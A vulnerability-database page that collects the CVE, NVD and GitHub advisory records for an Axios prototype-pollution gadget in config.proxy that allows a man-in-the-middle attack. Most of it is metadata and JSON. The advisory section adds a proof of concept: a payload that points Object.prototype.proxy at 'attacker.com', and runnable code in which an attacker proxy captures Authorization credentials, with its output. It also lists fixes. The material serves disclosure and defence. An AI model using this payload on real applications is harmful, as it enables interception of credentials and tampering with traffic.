CVE-2026-44494 (GCVE-0-2026-44494)

Vulnerability from cvelistv5 – Published: 2026-06-11 15:32 – Updated: 2026-06-13 03:55

Title

Axios: Full Man-in-the-Middle via Prototype Pollution Gadget in `config.proxy`

Summary

Axios is a promise based HTTP client for the browser and Node.js. From 1.0.0 to before 1.16.0, the Axios library is vulnerable to a Prototype Pollution "Gadget" attack that allows any Object.prototype pollution in the application's dependency tree to be escalated into a full Man-in-the-Middle (MITM) attack — intercepting, reading, and modifying all HTTP traffic including authentication credentials. The HTTP adapter at lib/adapters/http.js:670 reads config.proxy via standard property access, which traverses the prototype chain. Because proxy is not present in Axios defaults, the merged config object has no own proxy property, making it trivially injectable via prototype pollution. Once injected, setProxy() routes all HTTP requests through the attacker's proxy server. This vulnerability is fixed in 1.16.0.

Severity

8.7 (High)


                        
                          CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:N

SSVC

Exploitation: poc Automatable: no Technical Impact: total

CISA Coordinator (v2.0.3)

CWE

CWE-441 - Unintended Proxy or Intermediary ('Confused Deputy')
CWE-1321 - Improperly Controlled Modification of Object Prototype Attributes ('Prototype Pollution')

Assigner

GitHub_M

References

1 reference

URL	Tags
https://github.com/axios/axios/security/advisorie…	x_refsource_CONFIRM

Impacted products

1 product

Vendor	Product	Version
axios	axios	Affected: >= 1.0.0, < 1.16.0

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2026-44494",
                "options": [
                  {
                    "Exploitation": "poc"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "total"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2026-06-11T00:00:00+00:00",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2026-06-13T03:55:29.203Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "references": [
          {
            "tags": [
              "exploit"
            ],
            "url": "https://github.com/axios/axios/security/advisories/GHSA-35jp-ww65-95wh"
          }
        ],
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "axios",
          "vendor": "axios",
          "versions": [
            {
              "status": "affected",
              "version": "\u003e= 1.0.0, \u003c 1.16.0"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "Axios is a promise based HTTP client for the browser and Node.js. From 1.0.0 to before 1.16.0, the Axios library is vulnerable to a Prototype Pollution \"Gadget\" attack that allows any Object.prototype pollution in the application\u0027s dependency tree to be escalated into a full Man-in-the-Middle (MITM) attack \u2014 intercepting, reading, and modifying all HTTP traffic including authentication credentials. The HTTP adapter at lib/adapters/http.js:670 reads config.proxy via standard property access, which traverses the prototype chain. Because proxy is not present in Axios defaults, the merged config object has no own proxy property, making it trivially injectable via prototype pollution. Once injected, setProxy() routes all HTTP requests through the attacker\u0027s proxy server. This vulnerability is fixed in 1.16.0."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "HIGH",
            "attackVector": "NETWORK",
            "availabilityImpact": "NONE",
            "baseScore": 8.7,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "CHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:N",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-441",
              "description": "CWE-441: Unintended Proxy or Intermediary (\u0027Confused Deputy\u0027)",
              "lang": "en",
              "type": "CWE"
            }
          ]
        },
        {
          "descriptions": [
            {
              "cweId": "CWE-1321",
              "description": "CWE-1321: Improperly Controlled Modification of Object Prototype Attributes (\u0027Prototype Pollution\u0027)",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-06-11T15:32:03.155Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/axios/axios/security/advisories/GHSA-35jp-ww65-95wh",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/axios/axios/security/advisories/GHSA-35jp-ww65-95wh"
        }
      ],
      "source": {
        "advisory": "GHSA-35jp-ww65-95wh",
        "discovery": "UNKNOWN"
      },
      "title": "Axios: Full Man-in-the-Middle via Prototype Pollution Gadget in `config.proxy`"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2026-44494",
    "datePublished": "2026-06-11T15:32:03.155Z",
    "dateReserved": "2026-05-06T17:18:51.783Z",
    "dateUpdated": "2026-06-13T03:55:29.203Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2",
  "vulnerability-lookup:meta": {
    "epss": {
      "cve": "CVE-2026-44494",
      "date": "2026-06-17",
      "epss": "0.00416",
      "percentile": "0.33087"
    },
    "nvd": "{\"cve\":{\"id\":\"CVE-2026-44494\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2026-06-11T17:16:33.313\",\"lastModified\":\"2026-06-12T18:01:25.840\",\"vulnStatus\":\"Analyzed\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"Axios is a promise based HTTP client for the browser and Node.js. From 1.0.0 to before 1.16.0, the Axios library is vulnerable to a Prototype Pollution \\\"Gadget\\\" attack that allows any Object.prototype pollution in the application\u0027s dependency tree to be escalated into a full Man-in-the-Middle (MITM) attack \u2014 intercepting, reading, and modifying all HTTP traffic including authentication credentials. The HTTP adapter at lib/adapters/http.js:670 reads config.proxy via standard property access, which traverses the prototype chain. Because proxy is not present in Axios defaults, the merged config object has no own proxy property, making it trivially injectable via prototype pollution. Once injected, setProxy() routes all HTTP requests through the attacker\u0027s proxy server. This vulnerability is fixed in 1.16.0.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:N\",\"baseScore\":8.7,\"baseSeverity\":\"HIGH\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"HIGH\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"scope\":\"CHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"NONE\"},\"exploitabilityScore\":2.2,\"impactScore\":5.8}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-441\"},{\"lang\":\"en\",\"value\":\"CWE-1321\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:axios:axios:*:*:*:*:*:node.js:*:*\",\"versionStartIncluding\":\"1.0.0\",\"versionEndExcluding\":\"1.16.0\",\"matchCriteriaId\":\"BE82EB7B-A379-416F-9737-4191F720B8C6\"}]}]}],\"references\":[{\"url\":\"https://github.com/axios/axios/security/advisories/GHSA-35jp-ww65-95wh\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Exploit\",\"Vendor Advisory\",\"Mitigation\"]},{\"url\":\"https://github.com/axios/axios/security/advisories/GHSA-35jp-ww65-95wh\",\"source\":\"134c704f-9b21-4f2e-91b3-4a467353bcc0\",\"tags\":[\"Exploit\",\"Vendor Advisory\",\"Mitigation\"]}]}}",
    "vulnrichment": {
      "containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2026-44494\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"no\"}, {\"Technical Impact\": \"total\"}], \"version\": \"2.0.3\", \"timestamp\": \"2026-06-12T12:46:42.825228Z\"}}}], \"references\": [{\"url\": \"https://github.com/axios/axios/security/advisories/GHSA-35jp-ww65-95wh\", \"tags\": [\"exploit\"]}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2026-06-11T17:23:44.267Z\"}}], \"cna\": {\"title\": \"Axios: Full Man-in-the-Middle via Prototype Pollution Gadget in `config.proxy`\", \"source\": {\"advisory\": \"GHSA-35jp-ww65-95wh\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV3_1\": {\"scope\": \"CHANGED\", \"version\": \"3.1\", \"baseScore\": 8.7, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"HIGH\", \"vectorString\": \"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:N\", \"integrityImpact\": \"HIGH\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"HIGH\", \"availabilityImpact\": \"NONE\", \"privilegesRequired\": \"NONE\", \"confidentialityImpact\": \"HIGH\"}}], \"affected\": [{\"vendor\": \"axios\", \"product\": \"axios\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003e= 1.0.0, \u003c 1.16.0\"}]}], \"references\": [{\"url\": \"https://github.com/axios/axios/security/advisories/GHSA-35jp-ww65-95wh\", \"name\": \"https://github.com/axios/axios/security/advisories/GHSA-35jp-ww65-95wh\", \"tags\": [\"x_refsource_CONFIRM\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"Axios is a promise based HTTP client for the browser and Node.js. From 1.0.0 to before 1.16.0, the Axios library is vulnerable to a Prototype Pollution \\\"Gadget\\\" attack that allows any Object.prototype pollution in the application\u0027s dependency tree to be escalated into a full Man-in-the-Middle (MITM) attack \\u2014 intercepting, reading, and modifying all HTTP traffic including authentication credentials. The HTTP adapter at lib/adapters/http.js:670 reads config.proxy via standard property access, which traverses the prototype chain. Because proxy is not present in Axios defaults, the merged config object has no own proxy property, making it trivially injectable via prototype pollution. Once injected, setProxy() routes all HTTP requests through the attacker\u0027s proxy server. This vulnerability is fixed in 1.16.0.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-441\", \"description\": \"CWE-441: Unintended Proxy or Intermediary (\u0027Confused Deputy\u0027)\"}]}, {\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-1321\", \"description\": \"CWE-1321: Improperly Controlled Modification of Object Prototype Attributes (\u0027Prototype Pollution\u0027)\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2026-06-11T15:32:03.155Z\"}}}",
      "cveMetadata": "{\"cveId\": \"CVE-2026-44494\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2026-06-13T03:55:29.203Z\", \"dateReserved\": \"2026-05-06T17:18:51.783Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2026-06-11T15:32:03.155Z\", \"assignerShortName\": \"GitHub_M\"}",
      "dataType": "CVE_RECORD",
      "dataVersion": "5.2"
    }
  }
}

FKIE_CVE-2026-44494

Vulnerability from fkie_nvd - Published: 2026-06-11 17:16 - Updated: 2026-06-17 10:50

Severity

8.7 (High) - CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:N

Summary

References

	URL	Tags
	security-advisories@github.com	https://github.com/axios/axios/security/advisories/GHSA-35jp-ww65-95wh	Exploit, Mitigation, Vendor Advisory
	134c704f-9b21-4f2e-91b3-4a467353bcc0	https://github.com/axios/axios/security/advisories/GHSA-35jp-ww65-95wh	Exploit, Mitigation, Vendor Advisory

Impacted products

	Vendor	Product	Version
	axios	axios	*

JSON

To clipboard

{
  "affected": [
    {
      "affectedData": [
        {
          "product": "axios",
          "vendor": "axios",
          "versions": [
            {
              "status": "affected",
              "version": "\u003e= 1.0.0, \u003c 1.16.0"
            }
          ]
        }
      ],
      "source": "security-advisories@github.com"
    }
  ],
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:axios:axios:*:*:*:*:*:node.js:*:*",
              "matchCriteriaId": "BE82EB7B-A379-416F-9737-4191F720B8C6",
              "versionEndExcluding": "1.16.0",
              "versionStartIncluding": "1.0.0",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "Axios is a promise based HTTP client for the browser and Node.js. From 1.0.0 to before 1.16.0, the Axios library is vulnerable to a Prototype Pollution \"Gadget\" attack that allows any Object.prototype pollution in the application\u0027s dependency tree to be escalated into a full Man-in-the-Middle (MITM) attack \u2014 intercepting, reading, and modifying all HTTP traffic including authentication credentials. The HTTP adapter at lib/adapters/http.js:670 reads config.proxy via standard property access, which traverses the prototype chain. Because proxy is not present in Axios defaults, the merged config object has no own proxy property, making it trivially injectable via prototype pollution. Once injected, setProxy() routes all HTTP requests through the attacker\u0027s proxy server. This vulnerability is fixed in 1.16.0."
    }
  ],
  "id": "CVE-2026-44494",
  "lastModified": "2026-06-17T10:50:43.280",
  "metrics": {
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "HIGH",
          "attackVector": "NETWORK",
          "availabilityImpact": "NONE",
          "baseScore": 8.7,
          "baseSeverity": "HIGH",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "HIGH",
          "privilegesRequired": "NONE",
          "scope": "CHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:N",
          "version": "3.1"
        },
        "exploitabilityScore": 2.2,
        "impactScore": 5.8,
        "source": "security-advisories@github.com",
        "type": "Secondary"
      }
    ],
    "ssvcV203": [
      {
        "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
        "ssvcData": {
          "id": "CVE-2026-44494",
          "options": [
            {
              "exploitation": "poc"
            },
            {
              "automatable": "no"
            },
            {
              "technicalImpact": "total"
            }
          ],
          "role": "CISA Coordinator",
          "timestamp": "2026-06-11T00:00:00+00:00",
          "version": "2.0.3"
        }
      }
    ]
  },
  "published": "2026-06-11T17:16:33.313",
  "references": [
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Exploit",
        "Mitigation",
        "Vendor Advisory"
      ],
      "url": "https://github.com/axios/axios/security/advisories/GHSA-35jp-ww65-95wh"
    },
    {
      "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
      "tags": [
        "Exploit",
        "Mitigation",
        "Vendor Advisory"
      ],
      "url": "https://github.com/axios/axios/security/advisories/GHSA-35jp-ww65-95wh"
    }
  ],
  "sourceIdentifier": "security-advisories@github.com",
  "vulnStatus": "Analyzed",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-441"
        },
        {
          "lang": "en",
          "value": "CWE-1321"
        }
      ],
      "source": "security-advisories@github.com",
      "type": "Secondary"
    }
  ]
}

GHSA-35JP-WW65-95WH

Vulnerability from github – Published: 2026-05-29 16:04 – Updated: 2026-06-12 19:25

Summary

axios Vulnerable to Full Man-in-the-Middle via Prototype Pollution Gadget in `config.proxy`

Details

Vulnerability Disclosure: Full Man-in-the-Middle via Prototype Pollution Gadget in `config.proxy`

Summary

The Axios library is vulnerable to a Prototype Pollution "Gadget" attack that allows any Object.prototype pollution in the application's dependency tree to be escalated into a full Man-in-the-Middle (MITM) attack — intercepting, reading, and modifying all HTTP traffic including authentication credentials.

The HTTP adapter at lib/adapters/http.js:670 reads config.proxy via standard property access, which traverses the prototype chain. Because proxy is not present in Axios defaults, the merged config object has no own proxy property, making it trivially injectable via prototype pollution. Once injected, setProxy() routes all HTTP requests through the attacker's proxy server.

Unlike the transformResponse gadget (which is constrained by assertOptions to return true), the proxy gadget has zero constraints — the attacker gets a full MITM position with the ability to read all credentials and tamper with all responses.

Severity: Critical (CVSS 9.4) Affected Versions: All versions (v0.x - v1.x including v1.15.0) Vulnerable Component: lib/adapters/http.js (config property access on merged object)

CWE

CWE-1321: Improperly Controlled Modification of Object Prototype Attributes ('Prototype Pollution')
CWE-441: Unintended Proxy or Intermediary ('Confused Deputy')

CVSS 3.1

Score: 9.4 (Critical)

Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L

Metric	Value	Justification
Attack Vector	Network	PP is triggered remotely via any vulnerable dependency
Attack Complexity	Low	Once PP exists, single property assignment: `Object.prototype.proxy = {host:'attacker', port:8080}`. Consistent with GHSA-fvcv-3m26-pcqx scoring methodology
Privileges Required	None	No authentication needed
User Interaction	None	No user interaction required
Scope	Unchanged	MITM within the application's network context
Confidentiality	High	Attacker sees ALL request data: Authorization headers, auth credentials, cookies, request bodies, full URLs (including internal hostnames)
Integrity	High	Attacker can modify ALL responses: inject malicious data, alter API results, redirect authentication flows. No constraints — unlike `transformResponse` which must return `true`
Availability	Low	Attacker could drop requests or return errors, but this is secondary to C/I impact

Why This Bypasses mergeConfig

The critical difference from transformResponse: the proxy property is not in defaults (lib/defaults/index.js does not set proxy). This means:

mergeConfig iterates Object.keys({...defaults, ...userConfig}) — proxy is NOT in this set
defaultToConfig2 for proxy is never called
The merged config has no own proxy property
When http.js:670 reads config.proxy, JavaScript traverses the prototype chain
Object.prototype.proxy is found → used by setProxy()

This is a more direct attack path than transformResponse because it doesn't even go through mergeConfig's merge logic — it completely bypasses it.

Usage of "Helper" Vulnerabilities

This vulnerability requires Zero Direct User Input.

If an attacker can pollute Object.prototype via any other library in the stack (e.g., qs, minimist, lodash, body-parser), Axios will automatically use the polluted proxy value when making HTTP requests. The developer's code is completely safe — no configuration errors needed.

Proof of Concept

1. The Setup (Simulated Pollution)

Imagine a scenario where a known prototype pollution vulnerability exists in a query parser. The attacker sends a payload that sets:

Object.prototype.proxy = {
  host: 'attacker.com',
  port: 8080,
  protocol: 'http',
};

2. The Gadget Trigger (Safe Code)

The application makes a completely safe, hardcoded request:

// This looks safe to the developer — no proxy configured
const response = await axios.get('https://api.internal.corp/secrets', {
  auth: { username: 'svc-account', password: 'prod-key-abc123!' }
});

3. The Execution

At http.js:668-670:

setProxy(
  options,
  config.proxy,    // ← traverses prototype chain → finds polluted proxy
  protocol + '//' + parsed.hostname + (parsed.port ? ':' + parsed.port : '') + options.path
);

setProxy() at http.js:191-239 then:

function setProxy(options, configProxy, location) {
  let proxy = configProxy;    // = { host: 'attacker.com', port: 8080 }
  // ...
  if (proxy) {
    options.hostname = proxy.hostname || proxy.host;  // → 'attacker.com'
    options.port = proxy.port;                         // → 8080
    options.path = location;                           // → full URL as path
    // ...
  }
}

4. The Impact (Full MITM)

The attacker's proxy server receives:

GET http://api.internal.corp/secrets HTTP/1.1
Host: api.internal.corp
Authorization: Basic c3ZjLWFjY291bnQ6cHJvZC1rZXktYWJjMTIzIQ==
User-Agent: axios/1.15.0
Accept: application/json, text/plain, */*

The Authorization header contains svc-account:prod-key-abc123! in Base64. The attacker: - Sees every request URL, header, and body - Modifies every response (inject malicious data, change auth results) - Logs all API keys, session tokens, and passwords - Operates as an invisible proxy — the developer has no indication

5. Verified PoC Code

import http from 'http';
import axios from './index.js';

// Attacker's proxy server
const intercepted = [];
const proxyServer = http.createServer((req, res) => {
  intercepted.push({
    url: req.url,
    authorization: req.headers.authorization,
    headers: req.headers,
  });
  res.writeHead(200, { 'Content-Type': 'application/json' });
  res.end('{"hijacked":true}');
});
await new Promise(r => proxyServer.listen(0, r));
const proxyPort = proxyServer.address().port;

// Real target server
const realServer = http.createServer((req, res) => {
  res.writeHead(200);
  res.end('{"data":"real"}');
});
await new Promise(r => realServer.listen(0, r));
const realPort = realServer.address().port;

// Prototype pollution
Object.prototype.proxy = { host: '127.0.0.1', port: proxyPort, protocol: 'http' };

// "Safe" request — goes through attacker's proxy
const resp = await axios.get(`http://127.0.0.1:${realPort}/api/secrets`, {
  auth: { username: 'admin', password: 'SuperSecret123!' }
});

console.log('Response from:', resp.data.hijacked ? 'ATTACKER PROXY' : 'real server');
console.log('Intercepted Authorization:', intercepted[0]?.authorization);
// Output: Basic YWRtaW46U3VwZXJTZWNyZXQxMjMh (= admin:SuperSecret123!)

delete Object.prototype.proxy;
realServer.close();
proxyServer.close();

Verified PoC Output

[1] Normal request (before pollution):
    Response source: real server
    response.data: {"data":"from-real-server"}
    Proxy intercept count: 0

[2] Prototype Pollution: Object.prototype.proxy
    Set: Object.prototype.proxy = { host: "127.0.0.1", port: 50879 }

[3] Request after pollution (same code, same URL):
    Response source: ATTACKER PROXY!
    response.data: {"data":"from-attacker-proxy","hijacked":true}

[4] Data intercepted by attacker's proxy:
    Full URL: http://127.0.0.1:50878/api/secrets
    Host: 127.0.0.1:50878
    Authorization: Basic YWRtaW46U3VwZXJTZWNyZXQxMjMh
    All headers: {
      "accept": "application/json, text/plain, */*",
      "user-agent": "axios/1.15.0",
      "accept-encoding": "gzip, compress, deflate, br",
      "host": "127.0.0.1:50878",
      "authorization": "Basic YWRtaW46U3VwZXJTZWNyZXQxMjMh",
      "connection": "keep-alive"
    }

[5] Attacker capabilities demonstrated:
    ✓ Full URL visible (including internal hostnames)
    ✓ Authorization header visible (Base64-encoded credentials)
    ✓ Can modify/forge response data
    ✓ Affects ALL axios HTTP requests (not just a single instance)
    ✓ No assertOptions constraints (unlike transformResponse gadget)

Impact Analysis

Full Credential Interception: Every HTTP request's Authorization header, cookies, API keys, and request bodies are visible to the attacker's proxy in plaintext.
Arbitrary Response Tampering: The attacker can return any response data — no constraints like transformResponse's "must return true".
Internal Network Reconnaissance: The proxy sees all request URLs, revealing internal hostnames, ports, and API paths.
Universal Scope: Affects every axios HTTP request in the application, including all third-party libraries that use axios.
Invisible Attack: The developer has no indication that a proxy has been injected — requests complete normally with attacker-controlled responses.
Bypass of 1.15.0 Fix: The header sanitization patch in v1.15.0 (GHSA-fvcv-3m26-pcqx) does NOT address this vector.

Why This Is More Severe Than transformResponse (axios_26)

Dimension	transformResponse Gadget	proxy Gadget
Data access	`this.auth` + response data	All headers, auth, body, URL, response
Response control	Must return `true`	Arbitrary responses
Attack visibility	Response becomes `true` (suspicious)	Normal-looking responses (invisible)
mergeConfig involvement	Goes through defaultToConfig2	Bypasses mergeConfig entirely

Recommended Fix

Fix 1: Use `hasOwnProperty` when reading security-sensitive config properties

// In lib/adapters/http.js
const proxy = Object.prototype.hasOwnProperty.call(config, 'proxy') ? config.proxy : undefined;
setProxy(options, proxy, location);

Fix 2: Enumerate all properties not in defaults and apply `hasOwnProperty`

Properties not in defaults that are read by http.js and have security impact: - config.proxy — MITM - config.socketPath — Unix socket SSRF - config.transport — request hijack - config.lookup — DNS hijack - config.beforeRedirect — redirect manipulation - config.httpAgent / config.httpsAgent — agent injection

All should use hasOwnProperty checks.

Fix 3: Use null-prototype object for merged config

// In lib/core/mergeConfig.js
const config = Object.create(null);

Resources

Timeline

Date	Event
2026-04-16	Vulnerability discovered during source code audit
2026-04-16	PoC developed and verified — full MITM confirmed
TBD	Report submitted to vendor via GitHub Security Advisory

Severity

8.7 (High)


                  
                    CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:N

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "axios"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "1.0.0"
            },
            {
              "fixed": "1.16.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-44494"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1321",
      "CWE-441"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-05-29T16:04:00Z",
    "nvd_published_at": "2026-06-11T17:16:33Z",
    "severity": "HIGH"
  },
  "details": "# Vulnerability Disclosure: Full Man-in-the-Middle via Prototype Pollution Gadget in `config.proxy`\n\n## Summary\n\nThe Axios library is vulnerable to a Prototype Pollution \"Gadget\" attack that allows any `Object.prototype` pollution in the application\u0027s dependency tree to be escalated into a **full Man-in-the-Middle (MITM) attack** \u2014 intercepting, reading, and modifying all HTTP traffic including authentication credentials.\n\nThe HTTP adapter at `lib/adapters/http.js:670` reads `config.proxy` via standard property access, which traverses the prototype chain. Because `proxy` is **not present in Axios defaults**, the merged config object has no own `proxy` property, making it trivially injectable via prototype pollution. Once injected, `setProxy()` routes **all** HTTP requests through the attacker\u0027s proxy server.\n\nUnlike the `transformResponse` gadget (which is constrained by `assertOptions` to return `true`), the proxy gadget has **zero constraints** \u2014 the attacker gets a full MITM position with the ability to read all credentials and tamper with all responses.\n\n**Severity:** Critical (CVSS 9.4)\n**Affected Versions:** All versions (v0.x - v1.x including v1.15.0)\n**Vulnerable Component:** `lib/adapters/http.js` (config property access on merged object)\n\n## CWE\n\n- **CWE-1321:** Improperly Controlled Modification of Object Prototype Attributes (\u0027Prototype Pollution\u0027)\n- **CWE-441:** Unintended Proxy or Intermediary (\u0027Confused Deputy\u0027)\n\n## CVSS 3.1\n\n**Score: 9.4 (Critical)**\n\nVector: `CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L`\n\n| Metric | Value | Justification |\n|---|---|---|\n| Attack Vector | Network | PP is triggered remotely via any vulnerable dependency |\n| Attack Complexity | Low | Once PP exists, single property assignment: `Object.prototype.proxy = {host:\u0027attacker\u0027, port:8080}`. Consistent with GHSA-fvcv-3m26-pcqx scoring methodology |\n| Privileges Required | None | No authentication needed |\n| User Interaction | None | No user interaction required |\n| Scope | Unchanged | MITM within the application\u0027s network context |\n| Confidentiality | **High** | Attacker sees ALL request data: Authorization headers, auth credentials, cookies, request bodies, full URLs (including internal hostnames) |\n| Integrity | **High** | Attacker can modify ALL responses: inject malicious data, alter API results, redirect authentication flows. **No constraints** \u2014 unlike `transformResponse` which must return `true` |\n| Availability | Low | Attacker could drop requests or return errors, but this is secondary to C/I impact |\n\n\n### Why This Bypasses mergeConfig\n\nThe critical difference from `transformResponse`: the `proxy` property is **not in defaults** (`lib/defaults/index.js` does not set `proxy`). This means:\n\n1. `mergeConfig` iterates `Object.keys({...defaults, ...userConfig})` \u2014 `proxy` is NOT in this set\n2. `defaultToConfig2` for `proxy` is never called\n3. The merged config has **no own `proxy` property**\n4. When `http.js:670` reads `config.proxy`, JavaScript traverses the prototype chain\n5. `Object.prototype.proxy` is found \u2192 used by `setProxy()`\n\nThis is a **more direct attack path** than `transformResponse` because it doesn\u0027t even go through `mergeConfig`\u0027s merge logic \u2014 it completely bypasses it.\n\n## Usage of \"Helper\" Vulnerabilities\n\nThis vulnerability requires **Zero Direct User Input**.\n\nIf an attacker can pollute `Object.prototype` via any other library in the stack (e.g., `qs`, `minimist`, `lodash`, `body-parser`), Axios will automatically use the polluted `proxy` value when making HTTP requests. The developer\u0027s code is completely safe \u2014 no configuration errors needed.\n\n## Proof of Concept\n\n### 1. The Setup (Simulated Pollution)\n\nImagine a scenario where a known prototype pollution vulnerability exists in a query parser. The attacker sends a payload that sets:\n\n```javascript\nObject.prototype.proxy = {\n  host: \u0027attacker.com\u0027,\n  port: 8080,\n  protocol: \u0027http\u0027,\n};\n```\n\n### 2. The Gadget Trigger (Safe Code)\n\nThe application makes a completely safe, hardcoded request:\n\n```javascript\n// This looks safe to the developer \u2014 no proxy configured\nconst response = await axios.get(\u0027https://api.internal.corp/secrets\u0027, {\n  auth: { username: \u0027svc-account\u0027, password: \u0027prod-key-abc123!\u0027 }\n});\n```\n\n### 3. The Execution\n\nAt `http.js:668-670`:\n```javascript\nsetProxy(\n  options,\n  config.proxy,    // \u2190 traverses prototype chain \u2192 finds polluted proxy\n  protocol + \u0027//\u0027 + parsed.hostname + (parsed.port ? \u0027:\u0027 + parsed.port : \u0027\u0027) + options.path\n);\n```\n\n`setProxy()` at `http.js:191-239` then:\n```javascript\nfunction setProxy(options, configProxy, location) {\n  let proxy = configProxy;    // = { host: \u0027attacker.com\u0027, port: 8080 }\n  // ...\n  if (proxy) {\n    options.hostname = proxy.hostname || proxy.host;  // \u2192 \u0027attacker.com\u0027\n    options.port = proxy.port;                         // \u2192 8080\n    options.path = location;                           // \u2192 full URL as path\n    // ...\n  }\n}\n```\n\n### 4. The Impact (Full MITM)\n\nThe attacker\u0027s proxy server receives:\n\n```http\nGET http://api.internal.corp/secrets HTTP/1.1\nHost: api.internal.corp\nAuthorization: Basic c3ZjLWFjY291bnQ6cHJvZC1rZXktYWJjMTIzIQ==\nUser-Agent: axios/1.15.0\nAccept: application/json, text/plain, */*\n```\n\nThe `Authorization` header contains `svc-account:prod-key-abc123!` in Base64. The attacker:\n- **Sees** every request URL, header, and body\n- **Modifies** every response (inject malicious data, change auth results)\n- **Logs** all API keys, session tokens, and passwords\n- Operates as an **invisible** proxy \u2014 the developer has no indication\n\n### 5. Verified PoC Code\n\n```javascript\nimport http from \u0027http\u0027;\nimport axios from \u0027./index.js\u0027;\n\n// Attacker\u0027s proxy server\nconst intercepted = [];\nconst proxyServer = http.createServer((req, res) =\u003e {\n  intercepted.push({\n    url: req.url,\n    authorization: req.headers.authorization,\n    headers: req.headers,\n  });\n  res.writeHead(200, { \u0027Content-Type\u0027: \u0027application/json\u0027 });\n  res.end(\u0027{\"hijacked\":true}\u0027);\n});\nawait new Promise(r 